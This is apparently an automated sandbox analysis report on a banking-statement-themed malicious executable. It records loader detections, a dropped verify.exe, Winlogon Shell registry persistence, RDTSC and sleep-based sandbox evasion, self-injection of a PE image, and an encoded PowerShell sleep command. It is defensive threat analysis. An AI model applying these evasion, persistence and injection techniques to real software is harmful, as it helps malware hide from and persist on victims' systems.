Source:	Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.5e30000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.3af0730.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.931638980.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.935355147.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20220128_081138_756957 (1).exe PID: 3496, type: MEMORYSTR

.NET source code contains potential unpacker

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: verify.exe.0.dr, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.5.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.2.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.3.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.0.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.7.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.9.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack, Program.cs	.Net Code: Read System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_00E6EE9A pushad ; retf	0_2_00E6EE9D
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DBFD02 push E801035Eh; ret	0_2_05DBFD09
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB1CC8 push eax; retf	0_2_05DB1CC9
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DBFCF7 push E802005Eh; retf	0_2_05DBFD01
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0F08 pushad ; ret	0_2_05DB0F09
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB61E5 push edi; iretd	0_2_05DB61E6
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E95E73 push eax; ret	0_2_05E95E79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005BF4B8 pushfd ; ret	1_2_005BF4C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005E5D21 push es; ret	1_2_005E5D36
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041D052 push ecx; ret	17_2_0041D04F
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041D014 push ecx; ret	17_2_0041D04F
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041B832 push eax; ret	17_2_0041B838
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041B83B push eax; ret	17_2_0041B8A2
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041B89C push eax; ret	17_2_0041B8A2
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00417128 push esp; retf	17_2_00417129
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041D275 push ecx; ret	17_2_0041D04F
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041CD80 push ebp; ret	17_2_0041CD8F
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00414D94 push eax; iretd	17_2_00414D95
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00415EE8 push esi; iretd	17_2_00415EF3
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041B7E5 push eax; ret	17_2_0041B838

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: 0xE0201BDD [Fri Feb 25 20:11:09 2089 UTC]

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

File created: C:\Users\user\AppData\Local\verify.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe TID: 3524	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe TID: 3524	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe TID: 5616	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe TID: 1852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Code function: 17_2_004088D0 rdtsc

17_2_004088D0

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 642

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Code function: 17_2_004088D0 rdtsc

17_2_004088D0

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: Base64 decoded [Threading.Thread]::Sleep(20000)
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: Base64 decoded [Threading.Thread]::Sleep(20000)			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Memory written: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==			Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe			Jump to behavior

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936355832.0000000001DA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936355832.0000000001DA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936355832.0000000001DA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936355832.0000000001DA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
